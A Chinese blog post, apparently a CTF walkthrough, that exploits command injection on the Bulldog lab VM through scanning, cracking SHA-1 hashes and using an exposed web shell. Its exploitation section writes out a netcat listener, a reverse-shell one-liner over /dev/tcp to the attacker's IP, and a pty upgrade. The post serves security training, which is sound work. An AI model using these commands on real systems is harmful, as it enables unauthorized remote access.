ctf训练 命令执行漏洞

最新推荐文章于 2024-05-10 11:20:46 发布
最新推荐文章于 2024-05-10 11:20:46 发布
阅读量779 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43799246/article/details/110572336
版权

ctf训练 命令执行漏洞

命令执行漏洞介绍

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。

调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。

实验环境

一台kail攻击机 和 靶机
靶机镜像:https://pan.baidu.com/s/1wuAg-hARIBb_HNDZjqfrpQ
提取码:rh8v

安装打开靶机(使用Oracle VM VirtualBox打开):
(注意:靶机用桥接模式则攻击机也用桥接模式,注意检查!!!!)

接下来发现没法登陆,也没有办法获取ip地址
所以我们在kail下
进入控制台

使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述

线程调到20,名字改为py

在这里插入图片描述发现了admin这样一个目录
在这里插入图片描述这里nikto发现一个可疑目录/dev
在这里插入图片描述
访问/dev,发现了一个web-shell

在这里插入图片描述然后想着查看源代码,发现一些hash值,然后保存这些值

在这里插入图片描述6515229daf8dbdc8b89fed2e60f107433da5f2cb 38882f3b81f8f2bc47d9f3119155b05f954892fb c6f7e34d5d08ba4a40dd5627508ccb55b425e279 0e6ae9fe8af1cd4192865ac97ebf6bda414218a9 553d917a396414ab99785694afd51df3a8a8a3e0 ddf45997a7e18a25ad5f5cf222da64814dd060d5 d8b8dd5e7f000b8dea26ef8428caf38c04466b3e

hash破解

使用在线工具进行破解,然后破解出来的值为bulldog,然后去源代码下查看,对应的用户名为nick,然后登录

开放了80端口,使用dirb进行探测
dirb http://靶机ip,发现了两个可疑目录admin和dev
在这里插入图片描述
接下来我们通过浏览器访问,http://靶机ip/admin/,是一个登录界面

在这里插入图片描述
在这里插入图片描述
然后我们就进入到了系统后台

在这里插入图片描述漏洞利用

这里有安装教程:https://blog.csdn.net/qq_43799246/article/details/110669829

讲一个工具
挖漏洞,用扫描,可以使用AVWS进行扫描
这里输入靶机ip

在这里插入图片描述
然后点击scan,选择全扫描
在这里插入图片描述
然后就开始扫描了

我们进入了系统后台,再一次查看dev目录,然后我们发现这里的webshell可以点开了
在这里插入图片描述根据提示我们可以尝试一下这些命令,得到结果

在这里插入图片描述

这里发现id不能使用

在这里插入图片描述
反弹shell

攻击机启动监听netcat
nc -nlvp 4444

在这里插入图片描述

靶场机器反弹shell

echo 'bash -i>& /dev/tcp/192.168.43.96/4444 0>&1' | bash

在这里插入图片描述拿到shell
在这里插入图片描述

渗透测试技巧
优化反弹shell终端

 python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

我们在使用customPermissionApp提权时,先看说明文件

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

SUPERultimatePASSWORDyouCANTget

在这里插入图片描述
在这里插入图片描述

爱吃香菜的哈哈
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF命令执行常见绕过
qq_42383069的博客
04-18 5176
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
最全CTF Web题思路总结(更新ing)
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
DVWA靶场-命令注入漏洞~保姆级教程!!!
最新发布
2301_77360738的博客
05-10 660
超详细的dvwa靶场Command injection命令注入漏洞低、中、高等级的全面讲解,小白入!!!
网络渗透测试实验4:CTF实践
zzzfff__的博客
11-18 256
目的:获取靶机Web Developer 文件/root/flag.txt中flag。 基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。
CTF-web命令执行漏洞
IT小学子的博客
05-03 554
文章目录命令执行漏洞 命令执行漏洞 命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因:脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些...
ctf-web:文件上传漏洞和文件解析漏洞
热门推荐
薯片薯条的博客
10-11 9万+
这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍. 其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么… 当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了. 先说说这两个漏洞的区别. 一.文件上传漏洞 这个漏洞产生的原因是因为上传文件的不严谨所产生的.比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将.
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTF相关命令使用
01-21
了解CTF见到的非常不错的素材资源,这个是关于网络设置较多的文档
逆向分析漏洞例子ctf
10-19
逆向分析漏洞例子ctf
CTF中的其他漏洞1
08-03
本篇内容主要讨论了CTF中除常见漏洞之外的一些特殊类型,包括格式化字符串漏洞、竞争条件漏洞、代码逻辑漏洞以及类型混淆漏洞,并提供了相应的例子和解决方法。 1. **格式化字符串漏洞**: 格式化字符串漏洞通常...
CTF训练集 培训工具
03-16
CTF训练CTF培训工具。
毕业设计论坛源码jsp-WriteUp2017:某局CTF
06-06
毕业设计论坛源码jsp 安全检测专业论坛考试WriteUp 0x00前言 内网某局今年又开始搞CTF赛了,看到通知的时候本来想着手里还有一些事,不打算参加。 但是题目在那里总是手痒痒。一会去看看题目,一会去捣鼓捣鼓。最后受不了了,决定开始答题。 第一次参加这些比赛也是某局搞的,13年的事情了,那时候什么都不会,就会拿着工具找来找去。 后来2016年12月底到厅里面参加CTF比赛之前,恶补了许多知识。 但有很多知识点现在都想不起来了,还看了去年准备比赛时候做的笔记,觉得自己把过程写下来 不仅能加深自己的记忆,还能让巩固学到的东西,把许多似懂非懂的道理完全弄明白,一举两得。 所以决定边做题边把思路步骤写下来,就有了这个WriteUp。 0x01Web安全 Cookie欺骗 打开题目,是个叫做aspcms的系统登陆界面。 因为是个老的cms,毕竟漏洞很多了,上网搜索一下发现两处漏洞。 一处是和题目切合的Cookie欺骗, 另外一处是个SQL注入。懒得对着屏幕一个个敲Cookie信息(内外网物理隔离),直接走注入。 注入地址是http://ip/admin/_content/_About/As
ctf-web:关于文件上传漏洞的深入研究
薯片薯条的博客
10-14 8万+
上次我们研究了关于文件上传的漏洞,这次我们研究的内容属于上节课的补充内容,关于文件上传的绕过与防御. 怎么说呢,算是一种锻炼吧. 因为下个月有个awd的比赛,因此最近会经常发一些关于web的内容. 其实我还是挺慌的,因为以前参加的都是ctf线上赛,而且我做的都是逆向这个方面的,然而这次突然来了个web,搞得我有点懵. web也是最近才开始研究的,所以写的可能不尽人意,希望各位大佬看看就好,不喜勿喷. 一.实验环境 我们这次的实验依然用的是上次的网站和phpstudy.我发在了下面. 1.upload-f.
浅谈CTF中的逻辑漏洞
PICACHU+++的博客
10-07 1291
逻辑漏洞主要是指程序逻辑上出现的问题,例如逻辑不严密或者逻辑太复杂,从而导致一些逻辑分支不能正常处理或处理错误,通常这类漏洞多以月权访问,密码爆破等等。
ctfshow 日志包含Web80-81
m0_62584974的博客
04-16 6215
2022/4/16 题目过滤了php和data,我们这次要用日志文件包含 先抓包 nginx日志的默认路径为/var/log/nginx. ssh日志的默认路径为/var/log/auth.log SSH服务如果开启了日志记录功能,会将SSH的连接日志记录到SSH日志文件中(题目是nginx日志)日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述 现在要将恶意代码写入日志文件 /?file=/var/log/nginx/access.log &
国内首本CTF赛事技术解析书籍,五年之约,兑现了
华章IT官方博客
07-01 941
新书速递每一个CTF战队的发展其实都面临着一个问题,那就是“如何传承”。作为一个联合战队,随着老成员走向工作岗位,如何用良好的机制实现新老更替,是战队管理者需要认真考虑的问题。我们也尝...
sudo堆缓冲区溢出提权漏洞(CVE-2021-3156)
Ryan的博客
01-13 2784
sudo堆缓冲区溢出提权漏洞(CVE-2021-3156)
(45.3)【API接口漏洞专题】API接口原理、请求方法、类型、安全校验方法
05-07 2382
【专题】API漏洞之基础
CTFshow——RealWorldCTF渗透赛第二期·复现
chongya927的博客
03-12 589
RealWorldCTF渗透赛第二期·个人复现
Web安全:深入解析命令注入漏洞
2. **内部拼接命令**:开发者在编写代码时,可能将用户输入直接拼接到命令字符串中,如果没有正确地转义或过滤,恶意输入可能导致命令执行逻辑错误,从而触发漏洞。 防范命令注入攻击的方法主要包括: - **参数化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱吃香菜的哈哈

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值